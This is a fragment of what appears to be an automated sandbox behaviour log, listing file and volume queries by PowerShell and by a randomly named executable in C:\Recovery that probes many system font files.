                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
